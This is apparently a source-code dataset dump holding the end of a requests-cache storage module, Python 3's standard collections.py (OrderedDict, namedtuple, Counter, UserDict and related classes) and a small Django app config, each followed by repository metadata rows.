# Delay deletion until the end, to improve responsiveness when used as a generator
if delete_invalid:
logger.debug(f'Deleting {len(keys_to_delete)} invalid responses')
self.bulk_delete(keys_to_delete)
def __str__(self):
return f'redirects: {len(self.redirects)}\nresponses: {len(self.responses)}'
def __repr__(self):
return f'<{self.__class__.__name__}(name={self.name})>'
class BaseStorage(MutableMapping, ABC):
"""Base class for backend storage implementations
Args:
secret_key: Optional secret key used to sign cache items for added security
salt: Optional salt used to sign cache items
suppress_warnings: Don't show a warning when not using ``secret_key``
serializer: Custom serializer that provides ``loads`` and ``dumps`` methods
"""
def __init__(
self,
secret_key: Union[Iterable, str, bytes] = None,
salt: Union[str, bytes] = b'requests-cache',
suppress_warnings: bool = False,
serializer=None,
**kwargs,
):
self.serializer = serializer or self._get_serializer(secret_key, salt)
logger.debug(f'Initializing {type(self).__name__} with serializer: {self.serializer}')
if not secret_key:
level = DEBUG if suppress_warnings else WARNING
logger.log(level, 'Using a secret key is recommended for this backend')
def serialize(self, item: ResponseOrKey) -> bytes:
"""Serialize a URL or response into bytes"""
return self.serializer.dumps(item)
def deserialize(self, item: Union[ResponseOrKey, bytes]) -> ResponseOrKey:
"""Deserialize a cached URL or response"""
return self.serializer.loads(item)
@staticmethod
def _get_serializer(secret_key, salt):
"""Get the appropriate serializer to use; either ``itsdangerous``, if a secret key is
specified, or plain ``pickle`` otherwise.
"""
# Import in function scope to make itsdangerous an optional dependency
if secret_key:
return SafePickleSerializer(secret_key=secret_key, salt=salt)
else:
return PickleSerializer()
def bulk_delete(self, keys: Iterable[str]):
"""Delete multiple keys from the cache. Does not raise errors for missing keys. This is a
basic version that subclasses should override with a more efficient backend-specific
version, if possible.
"""
for k in keys:
try:
del self[k]
except KeyError:
pass
def __str__(self):
return str(list(self.keys()))
| 40.083969
| 113
| 0.654637
|
2b6abd879fc939deacc88302d883dcfd6d20e699
| 40,821
|
py
|
Python
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 4
|
2016-05-04T07:05:22.000Z
|
2020-09-24T00:21:05.000Z
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 11
|
2017-02-27T22:35:32.000Z
|
2021-12-24T08:07:40.000Z
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList',
'UserString', 'Counter', 'OrderedDict']
# For bootstrapping reasons, the collection ABCs are defined in _abcoll.py.
# They should however be considered an integral part of collections.py.
from _abcoll import *
import _abcoll
__all__ += _abcoll.__all__
from _collections import deque, defaultdict
from operator import itemgetter as _itemgetter
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from weakref import proxy as _proxy
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
from reprlib import recursive_repr as _recursive_repr
################################################################################
### OrderedDict
################################################################################
class _Link(object):
__slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev/next links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last==False).
Raises KeyError if the element does not exist.
When last=True, acts like a fast version of self[key]=self.pop(key).
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
last.next = root.prev = link
else:
first = root.next
link.prev = root
link.next = first
root.next = first.prev = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = MutableMapping.update
keys = MutableMapping.keys
values = MutableMapping.values
items = MutableMapping.items
__ne__ = MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
all(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
################################################################################
### namedtuple
################################################################################
_class_template = '''\
from builtins import property as _property, tuple as _tuple
from operator import itemgetter as _itemgetter
from collections import OrderedDict
class {typename}(tuple):
'{typename}({arg_list})'
__slots__ = ()
_fields = {field_names!r}
def __new__(_cls, {arg_list}):
'Create new instance of {typename}({arg_list})'
return _tuple.__new__(_cls, ({arg_list}))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new {typename} object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != {num_fields:d}:
raise TypeError('Expected {num_fields:d} arguments, got %d' % len(result))
return result
def __repr__(self):
'Return a nicely formatted representation string'
return self.__class__.__name__ + '({repr_fmt})' % self
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self))
__dict__ = property(_asdict)
def _replace(_self, **kwds):
'Return a new {typename} object replacing specified fields with new values'
result = _self._make(map(kwds.pop, {field_names!r}, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % list(kwds))
return result
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
{field_defs}
'''
_repr_template = '{name}=%r'
_field_template = '''\
{name} = _property(_itemgetter({index:d}), doc='Alias for field number {index:d}')
'''
def namedtuple(typename, field_names, verbose=False, rename=False):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessable by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Parse and validate the field names. Validation serves two purposes,
# generating informative error messages and preventing template injection attacks.
if isinstance(field_names, str):
field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas
field_names = list(map(str, field_names))
if rename:
seen = set()
for index, name in enumerate(field_names):
if (not all(c.isalnum() or c=='_' for c in name)
or _iskeyword(name)
or not name
or name[0].isdigit()
or name.startswith('_')
or name in seen):
field_names[index] = '_%d' % index
seen.add(name)
for name in [typename] + field_names:
if not all(c.isalnum() or c=='_' for c in name):
raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a keyword: %r' % name)
if name[0].isdigit():
raise ValueError('Type names and field names cannot start with a number: %r' % name)
seen = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: %r' % name)
if name in seen:
raise ValueError('Encountered duplicate field name: %r' % name)
seen.add(name)
# Fill-in the class template
class_definition = _class_template.format(
typename = typename,
field_names = tuple(field_names),
num_fields = len(field_names),
arg_list = repr(tuple(field_names)).replace("'", "")[1:-1],
repr_fmt = ', '.join(_repr_template.format(name=name) for name in field_names),
field_defs = '\n'.join(_field_template.format(index=index, name=name)
for index, name in enumerate(field_names))
)
# Execute the template string in a temporary namespace and
# support tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(__name__='namedtuple_%s' % typename)
try:
exec(class_definition, namespace)
except SyntaxError as e:
raise SyntaxError(e.msg + ':\n\n' + class_definition)
result = namespace[typename]
if verbose:
print(class_definition)
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
result.__module__ = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
'Tally elements from the iterable.'
mapping_get = mapping.get
for elem in iterable:
mapping[elem] = mapping_get(elem, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(self, iterable=None, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
super().__init__()
self.update(iterable, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(self, iterable=None, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in the some of original untouched counts
# being mixed-in with all of the other counts for a mismash that
# doesn't have a straight-forward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
super().update(iterable) # fast path when counter is empty
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(self, iterable=None, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
########################################################################
### ChainMap (helper for configparser)
########################################################################
class _ChainMap(MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can
accessed or updated using the *maps* attribute. There is no other state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return '{0.__class__.__name__}({1})'.format(
self, ', '.join(map(repr, self.maps)))
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self): # like Django's Context.push()
'New ChainMap with a new dict followed by all previous maps.'
return self.__class__({}, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
'Remove and return an item pair from maps[0]. Raise KeyError is maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
################################################################################
### UserDict
################################################################################
class UserDict(MutableMapping):
# Start by filling-out the abstract methods
def __init__(self, dict=None, **kwargs):
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def __iter__(self):
return iter(self.data)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self): return repr(self.data)
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
################################################################################
### UserList
################################################################################
class UserList(MutableSequence):
"""A more or less complete user-defined wrapper around list objects."""
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self): return repr(self.data)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __ne__(self, other): return self.data != self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cast(self, other):
return other.data if isinstance(other, UserList) else other
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
def __getitem__(self, i): return self.data[i]
def __setitem__(self, i, item): self.data[i] = item
def __delitem__(self, i): del self.data[i]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def append(self, item): self.data.append(item)
def insert(self, i, item): self.data.insert(i, item)
def pop(self, i=-1): return self.data.pop(i)
def remove(self, item): self.data.remove(item)
def count(self, item): return self.data.count(item)
def index(self, item, *args): return self.data.index(item, *args)
def reverse(self): self.data.reverse()
def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(Sequence):
def __init__(self, seq):
if isinstance(seq, str):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
return self.data == string
def __ne__(self, string):
if isinstance(string, UserString):
return self.data != string.data
return self.data != string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
return self.data < string
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
return self.data <= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
return self.data > string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
return self.data >= string
def __contains__(self, char):
if isinstance(char, UserString):
char = char.data
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, str):
return self.__class__(self.data + other)
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, str):
return self.__class__(other + self.data)
return self.__class__(str(other) + self.data)
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
return self.__class__(self.data.encode(encoding))
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=_sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.find(sub, start, end)
def format(self, *args, **kwds):
return self.data.format(*args, **kwds)
def index(self, sub, start=0, end=_sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def isidentifier(self): return self.data.isidentifier()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars))
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
if isinstance(old, UserString):
old = old.data
if isinstance(new, UserString):
new = new.data
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=_sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=_sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None): return self.__class__(self.data.strip(chars))
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
def zfill(self, width): return self.__class__(self.data.zfill(width))
################################################################################
### Simple tests
################################################################################
if __name__ == '__main__':
# verify that instances can be pickled
from pickle import loads, dumps
Point = namedtuple('Point', 'x, y', True)
p = Point(x=10, y=20)
assert p == loads(dumps(p))
# test and demonstrate ability to override methods
class Point(namedtuple('Point', 'x y')):
__slots__ = ()
@property
def hypot(self):
return (self.x ** 2 + self.y ** 2) ** 0.5
def __str__(self):
return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot)
for p in Point(3, 4), Point(14, 5/7.):
print (p)
class Point(namedtuple('Point', 'x y')):
'Point class with optimized _make() and _replace() without error-checking'
__slots__ = ()
_make = classmethod(tuple.__new__)
def _replace(self, _map=map, **kwds):
return self._make(_map(kwds.get, ('x', 'y'), self))
print(Point(11, 22)._replace(x=100))
Point3D = namedtuple('Point3D', Point._fields + ('z',))
print(Point3D.__doc__)
import doctest
TestResults = namedtuple('TestResults', 'failed attempted')
print(TestResults(*doctest.testmod()))
| 37.657749
| 126
| 0.57686
|
69c02a2ceea34fb3af0df57496542fe495ec0aea
| 103
|
py
|
Python
|
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
from django.apps import AppConfig
class FootagemanagerConfig(AppConfig):
name = 'FootageManager'
| 17.166667
| 38
| 0.786408
|
f3ce0e8f16f3e546ab85fe7dd2e233278f72333b
| 1,062
|
py
|
Python
|
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
